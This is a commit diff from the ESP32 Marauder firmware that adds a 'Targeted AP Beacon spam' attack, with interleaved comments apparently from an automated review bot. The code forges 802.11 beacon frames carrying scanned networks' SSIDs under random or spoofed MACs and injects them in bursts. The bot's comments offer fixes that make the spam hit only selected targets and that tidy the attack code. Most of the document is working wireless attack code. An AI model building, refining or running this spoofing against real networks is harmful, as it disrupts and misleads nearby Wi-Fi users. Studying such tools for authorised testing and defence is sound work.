Just Call Me Koko 3 лет назад
Родитель
Сommit
355236dc42
3 измененных файлов с 91 добавлено и 0 удалено
  1. 14 0
      esp32_marauder/CommandLine.cpp
  2. 75 0
      esp32_marauder/WiFiScan.cpp
  3. 2 0
      esp32_marauder/WiFiScan.h

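--- a/esp32_marauder/CommandLine.cpp
+++ b/esp32_marauder/CommandLine.cpp
@@ -271,6 +271,7 @@ void CommandLine::runCommand(String input) {
       int attack_type_switch = this->argSearch(&cmd_args, "-t"); // Required
       int list_beacon_sw = this->argSearch(&cmd_args, "-l");
       int rand_beacon_sw = this->argSearch(&cmd_args, "-r");
+      int ap_beacon_sw = this->argSearch(&cmd_args, "-a");
 
       if (attack_type_switch == -1) {
         Serial.println("You must specify an attack type");
@@ -317,6 +318,19 @@ void CommandLine::runCommand(String input) {
             Serial.println("Starting random Beacon spam. Stop with " + (String)STOPSCAN_CMD);
             wifi_scan_obj.StartScan(WIFI_ATTACK_BEACON_SPAM, TFT_ORANGE);
           }
+          // Spam from AP list
+          else if (ap_beacon_sw != -1) {
+            if (!this->apSelected()) {
+              Serial.println("You don't have any targets selected. Use " + (String)SEL_CMD);
+              return;
+            }
+            #ifdef HAS_SCREEN
+              display_obj.clearScreen();
+              menu_function_obj.drawStatusBar();
+            #endif
+            Serial.println("Starting Targeted AP Beacon spam. Stop with " + (String)STOPSCAN_CMD);
+            wifi_scan_obj.StartScan(WIFI_ATTACK_AP_SPAM, TFT_MAGENTA);
+          }
           else {
             Serial.println("You did not specify a beacon attack type");
           }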
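Review bot: The new `-a` branch is reachable only when neither `-l` nor `-r` was given, because it is third in the else-if chain, so an invocation that carries both `-l` and `-a` silently takes the list path and nothing in the hunk states that precedence. A one-line comment on the new switch would make it explicit: `int ap_beacon_sw = this->argSearch(&cmd_args, "-a"); // beacon spam using the selected APs' SSIDs; ignored when -l or -r is also present`. The apSelected() guard runs before StartScan, so the mode is never entered without targets, which is the right order. runCommand() begins and ends outside this hunk.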

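--- a/esp32_marauder/WiFiScan.cpp
+++ b/esp32_marauder/WiFiScan.cpp
@@ -300,6 +300,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
     this->startWiFiAttacks(scan_mode, color, text_table4[7]);
   else if (scan_mode == WIFI_ATTACK_DEAUTH)
     this->startWiFiAttacks(scan_mode, color, text_table4[8]);
+  else if (scan_mode == WIFI_ATTACK_AP_SPAM)
+    this->startWiFiAttacks(scan_mode, color, " AP Beacon Spam ");
   else if (scan_mode == BT_SCAN_ALL) {
     #ifdef HAS_BT
       RunBluetoothScan(scan_mode, color);
@@ -1677,6 +1679,70 @@ void WiFiScan::beaconListSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t
   }
 }
 
+/*
+void WiFiScan::broadcastAPBeacon(uint32_t currentTime, AccessPoint custom_ssid) {
+  set_channel = random(1,12); 
+  esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
+  delay(1);
+
+  // Randomize SRC MAC
+  packet[10] = packet[16] = custom_ssid.bssid[0];
+  packet[11] = packet[17] = custom_ssid.bssid[1];
+  packet[12] = packet[18] = custom_ssid.bssid[2];
+  packet[13] = packet[19] = custom_ssid.bssid[3];
+  packet[14] = packet[20] = custom_ssid.bssid[4];
+  packet[15] = packet[21] = custom_ssid.bssid[5];
+
+  char ESSID[custom_ssid.essid.length() + 1] = {};
+  custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
+}*/
+
+void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid) {
+  set_channel = random(1,12); 
+  esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
+  delay(1);  
+
+  // Randomize SRC MAC
+  packet[10] = packet[16] = random(256);
+  packet[11] = packet[17] = random(256);
+  packet[12] = packet[18] = random(256);
+  packet[13] = packet[19] = random(256);
+  packet[14] = packet[20] = random(256);
+  packet[15] = packet[21] = random(256);
+
+  char ESSID[custom_ssid.essid.length() + 1] = {};
+  custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
+
+  int ssidLen = strlen(ESSID);
+  //int rand_len = sizeof(rand_reg);
+  int fullLen = ssidLen;
+  packet[37] = fullLen;
+
+  // Insert my tag
+  for(int i = 0; i < ssidLen; i++)
+    packet[38 + i] = ESSID[i];
+
+  /////////////////////////////
+  
+  packet[50 + fullLen] = set_channel;
+
+  uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
+                      0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
+
+
+
+  // Add everything that goes after the SSID
+  for(int i = 0; i < 12; i++) 
+    packet[38 + fullLen + i] = postSSID[i];
+  
+
+  esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
+  esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
+  esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
+
+  packets_sent = packets_sent + 3;
+}
+
 void WiFiScan::broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid) {
   set_channel = random(1,12); 
   esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
@@ -2567,6 +2633,15 @@ void WiFiScan::main(uint32_t currentTime)
       packets_sent = 0;
     }
   }
+  else if ((currentScanMode == WIFI_ATTACK_AP_SPAM)) {
+    for (int i = 0; i < access_points->size(); i++)
+      this->broadcastCustomBeacon(currentTime, access_points->get(i));
+
+    if (currentTime - initTime >= 1000) {
+      initTime = millis();
+      packets_sent = 0;
+    }
+  }
   else if ((currentScanMode == WIFI_ATTACK_RICK_ROLL))
   {
     // Need this for loop because getTouch causes ~10ms delay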
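Review bot: The WIFI_ATTACK_AP_SPAM loop in main() beacons every entry of access_points, although CommandLine.cpp only enters this mode after apSelected() confirmed that targets were selected; if AccessPoint carries the selected flag that apSelected() checks, the loop should honour it: `if (access_points->get(i).selected) this->broadcastCustomBeacon(currentTime, access_points->get(i));`, otherwise selecting one AP spams the SSIDs of the whole scan list, contradicting the "Targeted AP Beacon spam" wording the CLI prints. Separately, in the new AccessPoint overload of broadcastCustomBeacon the length from strlen(ESSID) is stored in packet[37] and used as an offset into the packet buffer declared elsewhere without any upper bound; clamping it to the 802.11 SSID maximum, `int ssidLen = min((int)strlen(ESSID), 32);`, keeps the DS-parameter write at packet[50 + fullLen] inside the buffer regardless of where the essid String came from. The commented-out broadcastAPBeacon() above it, which used the target's bssid where the live overload randomizes the source MAC, is dead code and should either become the deliberate behaviour or be removed rather than committed. main() and the AccessPoint overload's enclosing context start and end outside this hunk.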

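--- a/esp32_marauder/WiFiScan.h
+++ b/esp32_marauder/WiFiScan.h
@@ -58,6 +58,7 @@
 #define WIFI_ATTACK_AUTH 18
 #define WIFI_ATTACK_MIMIC 19
 #define WIFI_ATTACK_DEAUTH 20
+#define WIFI_ATTACK_AP_SPAM 21
 
 #define GRAPH_REFRESH 100
 
@@ -229,6 +230,7 @@ class WiFiScan
     void sendDeauthAttack(uint32_t currentTime);
     void broadcastRandomSSID(uint32_t currentTime);
     void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid);
+    void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid);
     void broadcastSetSSID(uint32_t current_time, char* ESSID);
     void RunAPScan(uint8_t scan_mode, uint16_t color);
     //void RunRickRoll(uint8_t scan_mode, uint16_t color);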
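Review bot: The new overload takes AccessPoint by value, and main() in this same commit calls it once per access point on every iteration, so the struct — which at least holds the essid String the function reads — is copied for every beacon burst; declare it `void broadcastCustomBeacon(uint32_t current_time, const AccessPoint& custom_ssid);` and change the definition in WiFiScan.cpp to match. The existing ssid overload directly above has the same by-value shape, so this is a point of style rather than a defect, but the new code is the hotter caller. The WiFiScan class declaration starts and ends outside this hunk.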